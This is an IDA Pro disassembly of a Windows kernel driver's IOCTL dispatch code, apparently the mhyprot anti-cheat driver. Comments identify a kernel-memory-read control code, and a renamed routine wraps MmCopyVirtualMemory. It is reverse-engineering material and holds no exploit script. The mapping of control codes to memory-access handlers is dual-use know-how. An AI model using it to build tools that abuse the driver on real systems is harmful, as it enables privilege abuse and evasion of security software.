PAGE:FFFFF800188CD1B9 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD1B9
PAGE:FFFFF800188CD1B9 loc_FFFFF800188CD1B9: ; CODE XREF: sub_FFFFF800188CD000+F3↑j
PAGE:FFFFF800188CD1B9 mov rax, [rsp+30h]
PAGE:FFFFF800188CD1BE mov ecx, [rax]
PAGE:FFFFF800188CD1C0 call sub_FFFFF800188C696C
PAGE:FFFFF800188CD1C5 call sub_FFFFF800188C6994
PAGE:FFFFF800188CD1CA xor ecx, ecx
PAGE:FFFFF800188CD1CC cmp al, 1
PAGE:FFFFF800188CD1CE setz cl
PAGE:FFFFF800188CD1D1 mov dword ptr [rbp+1D0h+arg_20], ecx
PAGE:FFFFF800188CD1D7 jmp short loc_FFFFF800188CD17F
PAGE:FFFFF800188CD1D9 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD1D9
PAGE:FFFFF800188CD1D9 loc_FFFFF800188CD1D9: ; CODE XREF: sub_FFFFF800188CD000+E7↑j
PAGE:FFFFF800188CD1D9 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD1DE lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD1E3 mov r8d, ebx
PAGE:FFFFF800188CD1E6 xor edx, edx
PAGE:FFFFF800188CD1E8 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD1ED mov rcx, [rsp+30h]
PAGE:FFFFF800188CD1F2 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD1F7 call sub_FFFFF800188C4310
PAGE:FFFFF800188CD1FC test eax, eax
PAGE:FFFFF800188CD1FE jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD204 jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD209 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD209
PAGE:FFFFF800188CD209 loc_FFFFF800188CD209: ; CODE XREF: sub_FFFFF800188CD000+DB↑j
PAGE:FFFFF800188CD209 mov rax, [rsp+30h]
PAGE:FFFFF800188CD20E mov ecx, [rax]
PAGE:FFFFF800188CD210 call sub_FFFFF800188C48FC
PAGE:FFFFF800188CD215 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD21C
PAGE:FFFFF800188CD21C loc_FFFFF800188CD21C: ; CODE XREF: sub_FFFFF800188CD000+2EF↓j
PAGE:FFFFF800188CD21C ; sub_FFFFF800188CD000+2FE↓j ...
PAGE:FFFFF800188CD21C mov edx, 4
PAGE:FFFFF800188CD221 lea rcx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD228 jmp loc_FFFFF800188CD5F0
PAGE:FFFFF800188CD22D ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD22D
PAGE:FFFFF800188CD22D loc_FFFFF800188CD22D: ; CODE XREF: sub_FFFFF800188CD000+CF↑j
PAGE:FFFFF800188CD22D mov rax, [rsp+30h]
PAGE:FFFFF800188CD232 xor ecx, ecx ; PoolType
PAGE:FFFFF800188CD234 mov edi, [rax+4]
PAGE:FFFFF800188CD237 mov ebx, [rax]
PAGE:FFFFF800188CD239 imul rdx, rdi, 318h
PAGE:FFFFF800188CD240 add rdx, 4 ; NumberOfBytes
PAGE:FFFFF800188CD244 call cs:ExAllocatePool
PAGE:FFFFF800188CD24A mov r8d, edi
PAGE:FFFFF800188CD24D mov ecx, ebx
PAGE:FFFFF800188CD24F mov rsi, rax
PAGE:FFFFF800188CD252 lea rdx, [rax+4]
PAGE:FFFFF800188CD256 call sub_FFFFF800188C274C
PAGE:FFFFF800188CD25B mov [rsi], eax
PAGE:FFFFF800188CD25D cmp eax, edi
PAGE:FFFFF800188CD25F movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD266 cmova eax, edi
PAGE:FFFFF800188CD269 mov r9, r15
PAGE:FFFFF800188CD26C movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD273 mov r8, r14
PAGE:FFFFF800188CD276 mov rcx, rsi
PAGE:FFFFF800188CD279 imul edx, eax, 318h
PAGE:FFFFF800188CD27F lea rax, [rsp+20h+arg_10]
PAGE:FFFFF800188CD284 movaps [rsp+20h+arg_10], xmm0
PAGE:FFFFF800188CD289 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD291 movaps xmmword ptr [rsp+20h+arg_20], xmm1
PAGE:FFFFF800188CD296 movsd [rsp+20h+arg_30], xmm0
PAGE:FFFFF800188CD29C add edx, 4
PAGE:FFFFF800188CD29F mov [rsp+20h+var_s0], rax
PAGE:FFFFF800188CD2A4 call sub_FFFFF800188C2270
PAGE:FFFFF800188CD2A9 mov rcx, rsi ; P
PAGE:FFFFF800188CD2AC
PAGE:FFFFF800188CD2AC loc_FFFFF800188CD2AC: ; CODE XREF: sub_FFFFF800188CD000+574↓j
PAGE:FFFFF800188CD2AC xor edx, edx ; Tag
PAGE:FFFFF800188CD2AE call cs:ExFreePoolWithTag
PAGE:FFFFF800188CD2B4 jmp loc_FFFFF800188CD62B
PAGE:FFFFF800188CD2B9 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD2B9
PAGE:FFFFF800188CD2B9 loc_FFFFF800188CD2B9: ; CODE XREF: sub_FFFFF800188CD000+C9↑j
PAGE:FFFFF800188CD2B9 cmp ebx, 81064000h
PAGE:FFFFF800188CD2BF jz short loc_FFFFF800188CD320
PAGE:FFFFF800188CD2C1 cmp ebx, 81074000h
PAGE:FFFFF800188CD2C7 jz short loc_FFFFF800188CD303
PAGE:FFFFF800188CD2C9 cmp ebx, 81084000h
PAGE:FFFFF800188CD2CF jz short loc_FFFFF800188CD2F4
PAGE:FFFFF800188CD2D1 cmp ebx, 81094000h
PAGE:FFFFF800188CD2D7 jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD2DD mov rax, [rsp+30h]
PAGE:FFFFF800188CD2E2 mov ecx, [rax]
PAGE:FFFFF800188CD2E4 call sub_FFFFF800188C35B0
PAGE:FFFFF800188CD2E9
PAGE:FFFFF800188CD2E9 loc_FFFFF800188CD2E9: ; CODE XREF: sub_FFFFF800188CD000+32C↓j
PAGE:FFFFF800188CD2E9 ; sub_FFFFF800188CD000+59C↓j
PAGE:FFFFF800188CD2E9 mov dword ptr [rbp+1D0h+arg_20], eax
PAGE:FFFFF800188CD2EF jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD2F4 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD2F4
PAGE:FFFFF800188CD2F4 loc_FFFFF800188CD2F4: ; CODE XREF: sub_FFFFF800188CD000+2CF↑j
PAGE:FFFFF800188CD2F4 mov dword ptr [rbp+1D0h+arg_20], 133ECF0h
PAGE:FFFFF800188CD2FE jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD303 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD303
PAGE:FFFFF800188CD303 loc_FFFFF800188CD303: ; CODE XREF: sub_FFFFF800188CD000+2C7↑j
PAGE:FFFFF800188CD303 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD30A lea rdx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD311 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD316 call FFFFF800188C4214_WrapWrapMmCopyVirtualMemoryWrap
PAGE:FFFFF800188CD31B jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD320 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD320
PAGE:FFFFF800188CD320 loc_FFFFF800188CD320: ; CODE XREF: sub_FFFFF800188CD000+2BF↑j
PAGE:FFFFF800188CD320 mov rax, [rsp+30h]
PAGE:FFFFF800188CD325 mov ecx, [rax]
PAGE:FFFFF800188CD327 call sub_FFFFF800188C3614
PAGE:FFFFF800188CD32C jmp short loc_FFFFF800188CD2E9
PAGE:FFFFF800188CD32E ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD32E
PAGE:FFFFF800188CD32E loc_FFFFF800188CD32E: ; CODE XREF: sub_FFFFF800188CD000+BC↑j
PAGE:FFFFF800188CD32E mov rax, [rsp+30h]
PAGE:FFFFF800188CD333 mov ecx, [rax]
PAGE:FFFFF800188CD335 call sub_FFFFF800188C6834
PAGE:FFFFF800188CD33A
PAGE:FFFFF800188CD33A loc_FFFFF800188CD33A: ; CODE XREF: sub_FFFFF800188CD000+484↓j
PAGE:FFFFF800188CD33A mov [rbp+1D0h+arg_20], rax
PAGE:FFFFF800188CD341 lea rcx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD348 mov edx, 8
PAGE:FFFFF800188CD34D jmp loc_FFFFF800188CD5F0
PAGE:FFFFF800188CD352 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD352
PAGE:FFFFF800188CD352 loc_FFFFF800188CD352: ; CODE XREF: sub_FFFFF800188CD000+B6↑j
PAGE:FFFFF800188CD352 mov eax, 82044000h
PAGE:FFFFF800188CD357 cmp ebx, eax
PAGE:FFFFF800188CD359 ja loc_FFFFF800188CD4B1
PAGE:FFFFF800188CD35F jz loc_FFFFF800188CD489
PAGE:FFFFF800188CD365 cmp ebx, 81114000h
PAGE:FFFFF800188CD36B jz loc_FFFFF800188CD478
PAGE:FFFFF800188CD371 cmp ebx, 81124000h
PAGE:FFFFF800188CD377 jz loc_FFFFF800188CD407
PAGE:FFFFF800188CD37D cmp ebx, 82004000h
PAGE:FFFFF800188CD383 jz short loc_FFFFF800188CD3E6
PAGE:FFFFF800188CD385 cmp ebx, 82014000h
PAGE:FFFFF800188CD38B jz short loc_FFFFF800188CD3C1
PAGE:FFFFF800188CD38D cmp ebx, 82024000h
PAGE:FFFFF800188CD393 jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD399 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD39E lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3A3 mov r8d, ebx
PAGE:FFFFF800188CD3A6 xor edx, edx
PAGE:FFFFF800188CD3A8 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD3AD mov rcx, [rsp+30h]
PAGE:FFFFF800188CD3B2 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3B7 call sub_FFFFF800188C5F1C
PAGE:FFFFF800188CD3BC jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD3C1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD3C1
PAGE:FFFFF800188CD3C1 loc_FFFFF800188CD3C1: ; CODE XREF: sub_FFFFF800188CD000+38B↑j
PAGE:FFFFF800188CD3C1 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD3C6 lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3CB mov r8d, ebx
PAGE:FFFFF800188CD3CE xor edx, edx
PAGE:FFFFF800188CD3D0 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD3D5 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3DA xor ecx, ecx
PAGE:FFFFF800188CD3DC call sub_FFFFF800188C5FA0
PAGE:FFFFF800188CD3E1 jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD3E6 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD3E6
PAGE:FFFFF800188CD3E6 loc_FFFFF800188CD3E6: ; CODE XREF: sub_FFFFF800188CD000+383↑j
PAGE:FFFFF800188CD3E6 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD3EB and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD3F2 mov r8, [rcx]
PAGE:FFFFF800188CD3F5 mov rdx, [rcx+8]
PAGE:FFFFF800188CD3F9 mov rcx, [rcx+10h]
PAGE:FFFFF800188CD3FD call sub_FFFFF800188C6408
PAGE:FFFFF800188CD402 jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD407 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD407
PAGE:FFFFF800188CD407 loc_FFFFF800188CD407: ; CODE XREF: sub_FFFFF800188CD000+377↑j
PAGE:FFFFF800188CD407 lea rcx, qword_FFFFF800188CDB10
PAGE:FFFFF800188CD40E jmp loc_FFFFF800189F2672
PAGE:FFFFF800188CD40E ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD413 db 60h dup(0CCh)
PAGE:FFFFF800188CD473 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD473 jmp loc_FFFFF800188CD62B
PAGE:FFFFF800188CD478 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD478
PAGE:FFFFF800188CD478 loc_FFFFF800188CD478: ; CODE XREF: sub_FFFFF800188CD000+36B↑j
PAGE:FFFFF800188CD478 mov rax, [rsp+30h]
PAGE:FFFFF800188CD47D mov ecx, [rax]
PAGE:FFFFF800188CD47F call sub_FFFFF800188C3D44
PAGE:FFFFF800188CD484 jmp loc_FFFFF800188CD33A
PAGE:FFFFF800188CD489 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD489
PAGE:FFFFF800188CD489 loc_FFFFF800188CD489: ; CODE XREF: sub_FFFFF800188CD000+35F↑j
PAGE:FFFFF800188CD489 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD48E lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD493 mov r8d, ebx
PAGE:FFFFF800188CD496 xor edx, edx
PAGE:FFFFF800188CD498 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD49D mov rcx, [rsp+30h]
PAGE:FFFFF800188CD4A2 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD4A7 call sub_FFFFF800188C6268
PAGE:FFFFF800188CD4AC jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD4B1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD4B1
PAGE:FFFFF800188CD4B1 loc_FFFFF800188CD4B1: ; CODE XREF: sub_FFFFF800188CD000+359↑j
PAGE:FFFFF800188CD4B1 cmp ebx, 82054000h
PAGE:FFFFF800188CD4B7 jz loc_FFFFF800188CD5C6
PAGE:FFFFF800188CD4BD cmp ebx, 82064000h
PAGE:FFFFF800188CD4C3 jz loc_FFFFF800188CD5A1
PAGE:FFFFF800188CD4C9 cmp ebx, 82114000h
PAGE:FFFFF800188CD4CF jz loc_FFFFF800188CD579
PAGE:FFFFF800188CD4D5 cmp ebx, 83014000h
PAGE:FFFFF800188CD4DB jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD4E1 mov rbx, [rsp+30h]
PAGE:FFFFF800188CD4E6 cmp dword ptr [rbx], 88h
PAGE:FFFFF800188CD4EC jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD4F2 mov eax, [rbx+4]
PAGE:FFFFF800188CD4F5 xor ecx, ecx ; PoolType
PAGE:FFFFF800188CD4F7 imul rdx, rax, 2A8h
PAGE:FFFFF800188CD4FE add rdx, 4 ; NumberOfBytes
PAGE:FFFFF800188CD502 call cs:ExAllocatePool
PAGE:FFFFF800188CD508 mov rdi, rax
PAGE:FFFFF800188CD50B test rax, rax
PAGE:FFFFF800188CD50E jz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD514 lea rcx, [rax+4]
PAGE:FFFFF800188CD518 mov rdx, rbx
PAGE:FFFFF800188CD51B call sub_FFFFF800188C6038
PAGE:FFFFF800188CD520 mov [rdi], eax
PAGE:FFFFF800188CD522 mov r9, r15
PAGE:FFFFF800188CD525 mov ecx, [rbx+4]
PAGE:FFFFF800188CD528 mov r8, r14
PAGE:FFFFF800188CD52B movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD532 cmp eax, ecx
PAGE:FFFFF800188CD534 movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD53B cmova eax, ecx
PAGE:FFFFF800188CD53E mov rcx, rdi
PAGE:FFFFF800188CD541 movaps [rsp+20h+arg_10], xmm0
PAGE:FFFFF800188CD546 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD54E imul edx, eax, 2A8h
PAGE:FFFFF800188CD554 lea rax, [rsp+20h+arg_10]
PAGE:FFFFF800188CD559 movaps xmmword ptr [rsp+20h+arg_20], xmm1
PAGE:FFFFF800188CD55E movsd [rsp+20h+arg_30], xmm0
PAGE:FFFFF800188CD564 mov [rsp+20h+var_s0], rax
PAGE:FFFFF800188CD569 add edx, 4
PAGE:FFFFF800188CD56C call sub_FFFFF800188C2270
PAGE:FFFFF800188CD571 mov rcx, rdi
PAGE:FFFFF800188CD574 jmp loc_FFFFF800188CD2AC
PAGE:FFFFF800188CD579 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD579
PAGE:FFFFF800188CD579 loc_FFFFF800188CD579: ; CODE XREF: sub_FFFFF800188CD000+4CF↑j
PAGE:FFFFF800188CD579 mov rax, [rsp+30h]
PAGE:FFFFF800188CD57E mov edx, cs:dword_FFFFF800188CA688
PAGE:FFFFF800188CD584 mov ecx, [rax]
PAGE:FFFFF800188CD586 xor ecx, 0BAEBAEECh
PAGE:FFFFF800188CD58C cmp ecx, edx
PAGE:FFFFF800188CD58E jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD594 mov eax, cs:dword_FFFFF800188CA6EC
PAGE:FFFFF800188CD59A xor eax, edx
PAGE:FFFFF800188CD59C jmp loc_FFFFF800188CD2E9
PAGE:FFFFF800188CD5A1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD5A1
PAGE:FFFFF800188CD5A1 loc_FFFFF800188CD5A1: ; CODE XREF: sub_FFFFF800188CD000+4C3↑j
PAGE:FFFFF800188CD5A1 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD5A6 lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5AB mov r8d, ebx
PAGE:FFFFF800188CD5AE xor edx, edx
PAGE:FFFFF800188CD5B0 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD5B5 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD5BA lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5BF call sub_FFFFF800188C630C
PAGE:FFFFF800188CD5C4 jmp short loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD5C6 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD5C6
PAGE:FFFFF800188CD5C6 loc_FFFFF800188CD5C6: ; CODE XREF: sub_FFFFF800188CD000+4B7↑j
PAGE:FFFFF800188CD5C6 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD5CB lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5D0 mov r8d, ebx
PAGE:FFFFF800188CD5D3 xor edx, edx
PAGE:FFFFF800188CD5D5 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD5DA mov rcx, [rsp+30h]
PAGE:FFFFF800188CD5DF lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5E4 call sub_FFFFF800188C61BC
PAGE:FFFFF800188CD5E9
PAGE:FFFFF800188CD5E9 loc_FFFFF800188CD5E9: ; CODE XREF: sub_FFFFF800188CD000+204↑j
PAGE:FFFFF800188CD5E9 ; sub_FFFFF800188CD000+3BC↑j ...
PAGE:FFFFF800188CD5E9 lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5EE mov edx, ebx
PAGE:FFFFF800188CD5F0
PAGE:FFFFF800188CD5F0 loc_FFFFF800188CD5F0: ; CODE XREF: sub_FFFFF800188CD000+228↑j
PAGE:FFFFF800188CD5F0 ; sub_FFFFF800188CD000+34D↑j
PAGE:FFFFF800188CD5F0 movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD5F7 lea rax, [rsp+20h+arg_10]
PAGE:FFFFF800188CD5FC movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD603 movaps [rsp+20h+arg_10], xmm0
PAGE:FFFFF800188CD608 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD610 movsd [rsp+20h+arg_30], xmm0
PAGE:FFFFF800188CD616 movaps xmmword ptr [rsp+20h+arg_20], xmm1
PAGE:FFFFF800188CD61B
PAGE:FFFFF800188CD61B loc_FFFFF800188CD61B: ; CODE XREF: sub_FFFFF800188CD000+167↑j
PAGE:FFFFF800188CD61B ; sub_FFFFF800188CD000+1B4↑j
PAGE:FFFFF800188CD61B mov r9, r15
PAGE:FFFFF800188CD61E mov [rsp+20h+var_s0], rax
PAGE:FFFFF800188CD623 mov r8, r14
PAGE:FFFFF800188CD626 call sub_FFFFF800188C2270
PAGE:FFFFF800188CD62B
PAGE:FFFFF800188CD62B loc_FFFFF800188CD62B: ; CODE XREF: sub_FFFFF800188CD000+107↑j
PAGE:FFFFF800188CD62B ; sub_FFFFF800188CD000+1FE↑j ...
PAGE:FFFFF800188CD62B mov rbx, [rsp+30h]
PAGE:FFFFF800188CD630 test rbx, rbx
PAGE:FFFFF800188CD633 jz short loc_FFFFF800188CD640
PAGE:FFFFF800188CD635 xor edx, edx ; Tag
PAGE:FFFFF800188CD637 mov rcx, rbx ; P
PAGE:FFFFF800188CD63A call cs:ExFreePoolWithTag
PAGE:FFFFF800188CD640
PAGE:FFFFF800188CD640 loc_FFFFF800188CD640: ; CODE XREF: sub_FFFFF800188CD000+633↑j
PAGE:FFFFF800188CD640 mov al, 1
PAGE:FFFFF800188CD642
PAGE:FFFFF800188CD642 loc_FFFFF800188CD642: ; CODE XREF: sub_FFFFF800188CD000+AA↑j
PAGE:FFFFF800188CD642 lea r11, [rsp+20h+arg_280]
PAGE:FFFFF800188CD64A mov rbx, [r11+30h]
PAGE:FFFFF800188CD64E mov rsi, [r11+38h]
PAGE:FFFFF800188CD652 mov rsp, r11
PAGE:FFFFF800188CD655 pop r15
PAGE:FFFFF800188CD657 pop r14
PAGE:FFFFF800188CD659 pop r12
PAGE:FFFFF800188CD65B pop rdi
PAGE:FFFFF800188CD65C pop rbp
PAGE:FFFFF800188CD65D retn
PAGE:FFFFF800188CD65D sub_FFFFF800188CD000 endp
================================================
FILE: IDA/sub_FFFFF800188CD6E0.txt
================================================
PAGE:FFFFF800188CD6E0 ; =============== S U B R O U T I N E =======================================
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0 sub_FFFFF800188CD6E0 proc near ; DATA XREF: sub_FFFFF800189F277D+130↓o
PAGE:FFFFF800188CD6E0 ; .upx0:FFFFF800189F29C4↓o ...
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0 var_1A8 = qword ptr -1A8h
PAGE:FFFFF800188CD6E0 var_198 = byte ptr -198h
PAGE:FFFFF800188CD6E0 var_18 = byte ptr -18h
PAGE:FFFFF800188CD6E0 arg_0 = qword ptr 8
PAGE:FFFFF800188CD6E0 arg_8 = dword ptr 10h
PAGE:FFFFF800188CD6E0 P = qword ptr 18h
PAGE:FFFFF800188CD6E0 arg_18 = qword ptr 20h
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0 mov [rsp+arg_0], rbx
PAGE:FFFFF800188CD6E5 mov [rsp+arg_18], rbp
PAGE:FFFFF800188CD6EA push rsi
PAGE:FFFFF800188CD6EB push rdi
PAGE:FFFFF800188CD6EC push r14
PAGE:FFFFF800188CD6EE sub rsp, 1B0h
PAGE:FFFFF800188CD6F5 mov rax, [rdx+0B8h]
PAGE:FFFFF800188CD6FC mov rbp, rdx
PAGE:FFFFF800188CD6FF mov rdi, [rdx+18h]
PAGE:FFFFF800188CD703 mov ecx, [rax+18h]
PAGE:FFFFF800188CD706 mov r8d, [rax+10h]
PAGE:FFFFF800188CD70A mov esi, [rax+8]
PAGE:FFFFF800188CD70D and qword ptr [rdx+38h], 0
PAGE:FFFFF800188CD712 cmp ecx, 80104000h
PAGE:FFFFF800188CD718 jnz short loc_FFFFF800188CD737
PAGE:FFFFF800188CD71A mov edx, r8d
PAGE:FFFFF800188CD71D mov rcx, rdi
PAGE:FFFFF800188CD720 call sub_FFFFF800188C21EC
PAGE:FFFFF800188CD725 mov cs:dword_FFFFF800188CA110, eax
PAGE:FFFFF800188CD72B neg eax
PAGE:FFFFF800188CD72D sbb rcx, rcx
PAGE:FFFFF800188CD730 and ecx, 1
PAGE:FFFFF800188CD733 mov [rdi], ecx
PAGE:FFFFF800188CD735 jmp short loc_FFFFF800188CD75C
PAGE:FFFFF800188CD737 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD737
PAGE:FFFFF800188CD737 loc_FFFFF800188CD737: ; CODE XREF: sub_FFFFF800188CD6E0+38↑j
PAGE:FFFFF800188CD737 lea eax, [rcx+7FEEC000h]
PAGE:FFFFF800188CD73D mov edx, 80134000h
PAGE:FFFFF800188CD742 test eax, 0FFFCFFFFh
PAGE:FFFFF800188CD747 jnz short loc_FFFFF800188CD751
PAGE:FFFFF800188CD749 cmp ecx, edx
PAGE:FFFFF800188CD74B jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD751
PAGE:FFFFF800188CD751 loc_FFFFF800188CD751: ; CODE XREF: sub_FFFFF800188CD6E0+67↑j
PAGE:FFFFF800188CD751 cmp ecx, edx
PAGE:FFFFF800188CD753 jnz short loc_FFFFF800188CD766
PAGE:FFFFF800188CD755 call sub_FFFFF800188C2314
PAGE:FFFFF800188CD75A mov [rdi], eax
PAGE:FFFFF800188CD75C
PAGE:FFFFF800188CD75C loc_FFFFF800188CD75C: ; CODE XREF: sub_FFFFF800188CD6E0+55↑j
PAGE:FFFFF800188CD75C mov esi, 4
PAGE:FFFFF800188CD761 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD766 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD766
PAGE:FFFFF800188CD766 loc_FFFFF800188CD766: ; CODE XREF: sub_FFFFF800188CD6E0+73↑j
PAGE:FFFFF800188CD766 cmp ecx, 82054000h
PAGE:FFFFF800188CD76C jnz short loc_FFFFF800188CD77E
PAGE:FFFFF800188CD76E mov ecx, [rdi]
PAGE:FFFFF800188CD770 lea rdx, [rdi+4]
PAGE:FFFFF800188CD774 mov r8d, [rdx]
PAGE:FFFFF800188CD777 call sub_FFFFF800188C26D0
PAGE:FFFFF800188CD77C jmp short loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD77E ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD77E
PAGE:FFFFF800188CD77E loc_FFFFF800188CD77E: ; CODE XREF: sub_FFFFF800188CD6E0+8C↑j
PAGE:FFFFF800188CD77E cmp ecx, 83024000h
PAGE:FFFFF800188CD784 jnz short loc_FFFFF800188CD794
PAGE:FFFFF800188CD786 lea rcx, [rdi+4]
PAGE:FFFFF800188CD78A mov rdx, rdi
PAGE:FFFFF800188CD78D call sub_FFFFF800188C62EC
PAGE:FFFFF800188CD792 jmp short loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD794 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD794
PAGE:FFFFF800188CD794 loc_FFFFF800188CD794: ; CODE XREF: sub_FFFFF800188CD6E0+A4↑j
PAGE:FFFFF800188CD794 cmp ecx, 83074000h
PAGE:FFFFF800188CD79A jnz short loc_FFFFF800188CD7A9 ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
PAGE:FFFFF800188CD79C mov edx, [rdi]
PAGE:FFFFF800188CD79E lea rcx, [rdi+4]
PAGE:FFFFF800188CD7A2 call sub_FFFFF800188C5F18
PAGE:FFFFF800188CD7A7 jmp short loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD7A9 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD7A9
PAGE:FFFFF800188CD7A9 loc_FFFFF800188CD7A9: ; CODE XREF: sub_FFFFF800188CD6E0+BA↑j
PAGE:FFFFF800188CD7A9 cmp ecx, 83064000h ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
PAGE:FFFFF800188CD7AF jnz short loc_FFFFF800188CD7C8
PAGE:FFFFF800188CD7B1 mov rdx, [rdi]
PAGE:FFFFF800188CD7B4 lea rcx, [rdi+4]
PAGE:FFFFF800188CD7B8 mov r8d, [rdi+8]
PAGE:FFFFF800188CD7BC call sub_FFFFF800188C63A8
PAGE:FFFFF800188CD7C1
PAGE:FFFFF800188CD7C1 loc_FFFFF800188CD7C1: ; CODE XREF: sub_FFFFF800188CD6E0+9C↑j
PAGE:FFFFF800188CD7C1 ; sub_FFFFF800188CD6E0+B2↑j ...
PAGE:FFFFF800188CD7C1 mov [rdi], eax
PAGE:FFFFF800188CD7C3 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7C8 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD7C8
PAGE:FFFFF800188CD7C8 loc_FFFFF800188CD7C8: ; CODE XREF: sub_FFFFF800188CD6E0+CF↑j
PAGE:FFFFF800188CD7C8 cmp ecx, 82074000h
PAGE:FFFFF800188CD7CE jnz loc_FFFFF800188CD868
PAGE:FFFFF800188CD7D4 cmp r8d, 4
PAGE:FFFFF800188CD7D8 jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7DE cmp esi, 38h ; '8'
PAGE:FFFFF800188CD7E1 jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7E7 test rdi, rdi
PAGE:FFFFF800188CD7EA jz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7F0 mov r8d, 4746544Dh ; Tag
PAGE:FFFFF800188CD7F6 mov rdx, rsi ; NumberOfBytes
PAGE:FFFFF800188CD7F9 mov ecx, 1 ; PoolType
PAGE:FFFFF800188CD7FE call cs:ExAllocatePoolWithTag
PAGE:FFFFF800188CD804 mov r14, rax
PAGE:FFFFF800188CD807 lea rcx, [rsi-8]
PAGE:FFFFF800188CD80B mov rax, 0AAAAAAAAAAAAAAABh
